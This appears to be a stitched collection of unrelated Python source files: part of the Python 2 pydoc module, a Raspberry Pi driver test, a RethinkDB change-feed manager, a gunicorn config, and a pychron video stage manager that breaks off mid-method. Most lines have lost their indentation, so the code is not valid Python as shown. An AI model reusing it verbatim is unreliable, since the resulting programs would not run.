"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
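    # For example, help('%') finds symbols['%'] == 'OPERATORS FORMATTING', so
    # showsymbol('%') calls showtopic('OPERATORS', more_xrefs='FORMATTING');
    # 'OPERATORS' is itself an alias that resolves to the EXPRESSIONS topic.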
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
try:
module_doc = __import__(modname).__doc__
except ImportError:
module_doc = None
desc = split(module_doc or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
self.url = 'http://%s:%d/' % (self.address[0], self.server_port)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
def onerror(modname):
pass
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done),
kwargs=dict(onerror=onerror)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
        # file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
test_utility.py
|
import shlex
import subprocess
from multiprocessing import Process
from time import sleep
from src.raspberry_pi_driver.utility import (
hash_prefix,
terminate_cmd,
terminate_proc,
)
def test_hash_prefix():
res = hash_prefix("rokku")
expected = (
"320bda34a3c7f8dc49e5c976792f20ef5ec6f400b970138393020709bc2c1bc1"
)
assert res == expected
def test_terminate_proc(logger):
def test_fun():
while True:
sleep(1)
test_proc = Process(target=test_fun, name="Test Fun", args=())
test_proc.start()
terminate_proc(test_proc, logger)
assert not test_proc.is_alive()
def test_terminate_cmd(logger):
test_cmd = subprocess.Popen(shlex.split("sleep 10"))
terminate_cmd(test_cmd, "Test CMD", logger)
assert test_cmd.poll() is not None
|
data.py
|
#!/usr/bin/env python
# Flirble DNS Server
# RethinkDB handler
#
# Copyright 2016 Chris Luke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, logging
log = logging.getLogger(os.path.basename(__file__))
import sys, threading, time, traceback
import rethinkdb as r
import FlirbleDNSServer as fdns
"""
Manages the connection with a RethinkDB.
There is at least one connection to the DB, used for queries and updates.
Further connections may be initiated and managed from their own threads
to monitor tables for changes; any such changes are delivered to callback
functions.
"""
class Data(object):
r = None
rlock = None
_table_threads = None
_tlock = None
_running = None
"""
Configure the database manager.
This does not start any connections, it only configures the object.
@param remote str The remote database to connect to in the format
"host:port". ':port' is optional and will the RethinkDB client
driver will default to '28015'.
@param name str The name of the database on the host to use.
@param auth str An authentication key. Defaults to an empty string.
@param ssl dict SSL options. See RethinkDB 'connect' for details.
"""
def __init__(self, remote, name, auth=None, ssl=dict()):
super(Data, self).__init__()
if auth is None:
auth = ""
self._table_threads = {}
if ':' in remote:
(host, port) = remote.split(':')
else:
host = remote
port = 28015
self._host = host
self._port = port
self._name = name
self._auth = auth
self._ssl = ssl
self.rlock = threading.Lock()
self._tlock = threading.Lock()
self.running = False
"""
Start the primary database connection.
@returns bool True on success, False otherwise.
"""
def start(self):
log.info("Connecting to RethinkDB at '%s:%s' db '%s'." %
(self._host, self._port, self._name))
try:
self.r = r.connect(host=self._host, port=self._port,
db=self._name, auth_key=self._auth, ssl=self._ssl)
except r.ReqlDriverError as e:
log.error("Unable to connect to RethinkDB at '%s:%s' " \
"db '%s': %s." %
(self._host, self._port, self._name, e.message))
log.debug("%s." % traceback.format_exc())
return False
        self.running = True
        return True
"""
Adds a thread monitoring a table for changes, calling the cb when
a change is made.
    The thread is a daemon thread, so it does not block the process
from exiting.
@param table str The name of the table to monitor.
@param cb function A function to call when changes arrive. This should
match the signature 'def _cb(self, rdb, change)' where 'rdb' is
a reference to this calling object and 'change' is a dictionary
containing the change. See RethinkDB documentation for the contents
        of 'change'.
@returns bool True on success, False otherwise. Reasons to fail include
failing to connect to the database or trying to monitor a table
        we're already monitoring.
"""
def register_table(self, table, cb):
# create _monitor_thread
if table in self._table_threads:
return False
log.info("Connecting to RethinkDB at '%s:%s' db '%s' to monitor " \
"table '%s'." % (self._host, self._port, self._name, table))
try:
connection = r.connect(host=self._host, port=self._port,
db=self._name, auth_key=self._auth, ssl=self._ssl)
except r.ReqlDriverError as e:
log.error("Unable to connect to RethinkDB at '%s:%s' " \
"db '%s': %s." %
(self._host, self._port, self._name, e.message))
log.debug("%s." % traceback.format_exc())
return False
args = {
'table': table,
'cb': cb,
'connection': connection
}
try:
t = threading.Thread(target=self._monitor_thread, kwargs=args)
except Exception as e:
log.error("Unable to start monitoring thread for " \
"table '%s': %s." % (table, e.message))
log.debug("%s." % traceback.format_exc())
connection.close()
return False
with self._tlock:
self._table_threads[table] = {
"thread": t,
"connection": connection
}
t.daemon = True
t.start()
return True
"""
The thread target that monitors a table for changes.
@param table str The name of the table to monitor.
@param cb function The callback function that will be called.
@param connection rethinkdb.Connection The database connection to use
for the monitoring.
"""
def _monitor_thread(self, table, cb, connection):
log.info("Monitoring table '%s' for changes." % table)
feed = r.table(table).changes(include_initial=True).run(connection)
# TODO need to find a way to make this interruptible for a cleaner
# exit when we're asked to stop running
for change in feed:
cb(self, change)
if not self.running:
break
log.info("Closing RethinkDB connection for " \
"monitoring table '%s'." % table)
with self._tlock:
del(self._table_threads[table])
try:
connection.close()
except:
pass
"""
    Stop all running data monitoring threads and shut down connections
to the database.
"""
def stop(self):
log.info("Shutting down table monitoring threads...")
self.running = False
        # Iterate over a snapshot: each monitor thread removes its own entry
        # from _table_threads as it shuts down.
        for table, tt in list(self._table_threads.items()):
log.debug("Waiting for thread monitoring " \
"table '%s' to stop..." % table)
tt['thread'].join(1)
log.info("Closing main RethinkDB connection...")
self.r.close()
# Cleanup
self._table_threads = {}
self.r = None
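# A minimal usage sketch for this class. The remote address, database and
# table names below are assumptions for illustration only.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)

    def _on_zones_change(rdb, change):
        # 'rdb' is the Data instance, 'change' is the dict RethinkDB delivers.
        log.info("zones change: %r" % (change,))

    data = Data("localhost:28015", "flirble")          # hypothetical remote/db
    data.start()
    data.register_table("zones", _on_zones_change)     # hypothetical table
    try:
        time.sleep(5)                                   # let the monitor run briefly
    except KeyboardInterrupt:
        pass
    data.stop()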
|
gunicorn_conf.py
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Config file for gunicorn."""
import os
import threading
from importlib import import_module
import gunicorn
gunicorn.SERVER_SOFTWARE = 'unknown'
worker_class = 'sync'
workers = 1
threads = min(30, os.cpu_count() * 2 + 1)
worker_connections = 1000
timeout = 30
graceful_timeout = 30
daemon = True
captureoutput = True
# Write gunicorn's default log to the stream, and use the mindinsight logger to write gunicorn logs to file.
accesslog = '-'
def on_starting(server):
"""Hook function on starting gunicorn process."""
hook_module = import_module('mindinsight.utils.hook')
for hook in hook_module.HookUtils.instance().hooks():
threading.Thread(target=hook.on_startup, args=(server.log,)).start()
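# Usage sketch: gunicorn reads this module when launched with "-c", e.g.
# (the application module path here is an assumption, not defined in this file):
#
#     gunicorn -c gunicorn_conf.py mindinsight.backend.application:APP
#
# The on_starting() hook then runs once in the gunicorn master process before
# workers are spawned, starting each registered startup hook in its own thread.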
|
video_stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import shutil
import time
from threading import Timer, Event as TEvent
from apptools.preferences.preference_binding import bind_preference
from numpy import copy
from skimage.color import gray2rgb
from skimage.draw import circle_perimeter, line
# ============= enthought library imports =======================
from traits.api import (
Instance,
String,
Property,
Button,
Bool,
Event,
on_trait_change,
Str,
Float,
Enum,
Int,
)
from pychron.canvas.canvas2D.camera import Camera, YamlCamera, BaseCamera
from pychron.core.helpers.binpack import pack, encode_blob
from pychron.core.helpers.filetools import unique_path, unique_path_from_manifest
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.core.ui.thread import Thread as QThread
from pychron.core.ui.thread import sleep
from pychron.core.yaml import yload
from pychron.image.video import Video, pil_save
from pychron.mv.lumen_detector import LumenDetector
from pychron.paths import paths
from .stage_manager import StageManager
try:
from pychron.canvas.canvas2D.video_laser_tray_canvas import VideoLaserTrayCanvas
except ImportError:
from pychron.canvas.canvas2D.laser_tray_canvas import (
LaserTrayCanvas as VideoLaserTrayCanvas,
)
class VideoStageManager(StageManager):
""" """
video = Instance(Video)
camera = Instance(BaseCamera)
canvas_editor_klass = VideoComponentEditor
camera_zoom_coefficients = Property(
String(enter_set=True, auto_set=False), depends_on="_camera_zoom_coefficients"
)
_camera_zoom_coefficients = String
use_auto_center_interpolation = Bool(False)
configure_camera_device_button = Button
autocenter_button = Button("AutoCenter")
configure_autocenter_button = Button("Configure")
autocenter_manager = Instance("pychron.mv.autocenter_manager.AutoCenterManager")
autofocus_manager = Instance("pychron.mv.focus.autofocus_manager.AutoFocusManager")
# zoom_calibration_manager = Instance(
# 'pychron.mv.zoom.zoom_calibration.ZoomCalibrationManager')
snapshot_button = Button("Snapshot")
snapshot_mode = Enum("Single", "3 Burst", "10 Burst")
auto_save_snapshot = Bool(True)
record = Event
record_label = Property(depends_on="is_recording")
is_recording = Bool
use_db = False
use_video_archiver = Bool(True)
video_archiver = Instance("pychron.core.helpers.archiver.Archiver")
video_identifier = Str
# use_video_server = Bool(False)
# video_server_port = Int
# video_server_quality = Int
# video_server = Instance('pychron.image.video_server.VideoServer')
use_media_storage = Bool(False)
auto_upload = Bool(False)
keep_local_copy = Bool(False)
lumen_detector = Instance(LumenDetector)
render_with_markup = Bool(False)
burst_delay = Int(250)
_auto_correcting = False
stop_timer = Event
pxpermm = Float(23)
_measure_grain_t = None
_measure_grain_evt = None
grain_polygons = None
dimension_multiplier = Float(1)
def motor_event_hook(self, name, value, *args, **kw):
if name == "zoom":
self._update_zoom(value)
def bind_preferences(self, pref_id):
self.debug("binding preferences")
super(VideoStageManager, self).bind_preferences(pref_id)
if self.autocenter_manager:
self.autocenter_manager.bind_preferences(pref_id)
# bind_preference(self.autocenter_manager, 'use_autocenter',
# '{}.use_autocenter'.format(pref_id))
bind_preference(
self, "render_with_markup", "{}.render_with_markup".format(pref_id)
)
bind_preference(self, "burst_delay", "{}.burst_delay".format(pref_id))
bind_preference(self, "auto_upload", "{}.auto_upload".format(pref_id))
bind_preference(
self, "use_media_storage", "{}.use_media_storage".format(pref_id)
)
bind_preference(self, "keep_local_copy", "{}.keep_local_copy".format(pref_id))
bind_preference(
self, "dimension_multiplier", "{}.dimension_multiplier".format(pref_id)
)
bind_preference(
self, "use_video_archiver", "{}.use_video_archiver".format(pref_id)
)
bind_preference(self, "video_identifier", "{}.video_identifier".format(pref_id))
bind_preference(self, "use_video_server", "{}.use_video_server".format(pref_id))
bind_preference(
self.video_archiver,
"archive_months",
"{}.video_archive_months".format(pref_id),
)
bind_preference(
self.video_archiver, "archive_days", "{}.video_archive_days".format(pref_id)
)
bind_preference(
self.video_archiver,
"archive_hours",
"{}.video_archive_hours".format(pref_id),
)
bind_preference(
self.video_archiver, "root", "{}.video_directory".format(pref_id)
)
# bind_preference(self.video, 'output_mode',
# '{}.video_output_mode'.format(pref_id))
# bind_preference(self.video, 'ffmpeg_path',
# '{}.ffmpeg_path'.format(pref_id))
def get_grain_polygon(self):
ld = self.lumen_detector
l, m = ld.lum()
return m.tostring()
def get_grain_polygon_blob(self):
# self.debug('Get grain polygons n={}'.format(len(self.grain_polygons)))
try:
t, md, p = next(self.grain_polygons)
a = pack("ff", ((t, md),))
b = pack("HH", p)
return encode_blob(a + b)
except (StopIteration, TypeError) as e:
self.debug("No more grain polygons. {}".format(e))
def stop_measure_grain_polygon(self):
self.debug("Stop measure polygons {}".format(self._measure_grain_evt))
if self._measure_grain_evt:
self._measure_grain_evt.set()
return True
def start_measure_grain_polygon(self):
self._measure_grain_evt = evt = TEvent()
def _measure_grain_polygon():
ld = self.lumen_detector
dim = self.get_target_dimension()
ld.pxpermm = self.pxpermm
self.debug("Starting measure grain polygon")
masks = []
display_image = self.autocenter_manager.display_image
mask_dim = self.get_mask_dimension()
mask_dim_mm = mask_dim * self.pxpermm
ld.grain_measuring = True
while not evt.is_set():
src = self._get_preprocessed_src()
if src is not None:
targets = ld.find_targets(
display_image,
src,
dim,
mask=mask_dim,
search={"start_offset_scalar": 1},
)
if targets:
t = time.time()
targets = [
(t, mask_dim_mm, ti.poly_points.tolist()) for ti in targets
]
masks.extend(targets)
sleep(0.1)
ld.grain_measuring = False
self.grain_polygons = (m for m in masks)
self.debug("exiting measure grain")
self._measure_grain_t = QThread(target=_measure_grain_polygon)
self._measure_grain_t.start()
return True
def start_recording(
self, path=None, use_dialog=False, basename="vm_recording", **kw
):
""" """
directory = None
if os.path.sep in basename:
args = os.path.split(basename)
directory, basename = os.path.sep.join(args[:-1]), args[-1]
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
vd = self.video_archiver.root
self.debug("video archiver root {}".format(vd))
if not vd:
vd = paths.video_dir
if directory:
vd = os.path.join(vd, directory)
if not os.path.isdir(vd):
os.mkdir(vd)
path = unique_path_from_manifest(vd, basename, extension="avi")
kw["path"] = path
kw["basename"] = basename
self._start_recording(**kw)
self.is_recording = True
return path
def stop_recording(self, user="remote", delay=None):
""" """
def close():
self.is_recording = False
self.info("stop video recording")
p = self.video.output_path
if self.video.stop_recording(wait=True):
if self.auto_upload:
try:
p = self._upload(p, inform=False)
except BaseException as e:
self.critical("Failed uploading {}. error={}".format(p, e))
return p
if self.video.is_recording():
if delay:
t = Timer(delay, close)
t.start()
else:
return close()
@property
def video_configuration_path(self):
if self.configuration_dir_path:
return os.path.join(self.configuration_dir_path, "camera.yaml")
def initialize_video(self):
if self.video:
identifier = 0
p = self.video_configuration_path
if os.path.isfile(p):
yd = yload(p)
vid = yd["Device"]
identifier = vid.get("identifier", 0)
self.video.open(identifier=identifier)
self.video.load_configuration(p)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def initialize_stage(self):
super(VideoStageManager, self).initialize_stage()
self.initialize_video()
# s = self.stage_controller
# if s.axes:
# xa = s.axes['x'].drive_ratio
# ya = s.axes['y'].drive_ratio
# self._drive_xratio = xa
# self._drive_yratio = ya
self._update_zoom(0)
def autocenter(self, *args, **kw):
return self._autocenter(*args, **kw)
def snapshot(
self,
path=None,
name=None,
auto=False,
inform=True,
return_blob=False,
pic_format=".jpg",
include_raw=True,
):
"""
path: abs path to use
name: base name to use if auto saving in default dir
auto: force auto save
returns:
path: local abs path
upath: remote abs path
"""
if path is None:
if self.auto_save_snapshot or auto:
if name is None:
name = "snapshot"
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
elif name is not None:
if not os.path.isdir(os.path.dirname(name)):
path = unique_path_from_manifest(
paths.snapshot_dir, name, pic_format
)
else:
path = name
else:
path = self.save_file_dialog()
if path:
self.info("saving snapshot {}".format(path))
# play camera shutter sound
# play_sound('shutter')
if include_raw:
frame = self.video.get_cached_frame()
head, _ = os.path.splitext(path)
raw_path = "{}.tif".format(head)
pil_save(frame, raw_path)
self._render_snapshot(path)
if self.auto_upload:
if include_raw:
self._upload(raw_path)
upath = self._upload(path, inform=inform)
if upath is None:
upath = ""
if inform:
if self.keep_local_copy:
self.information_dialog(
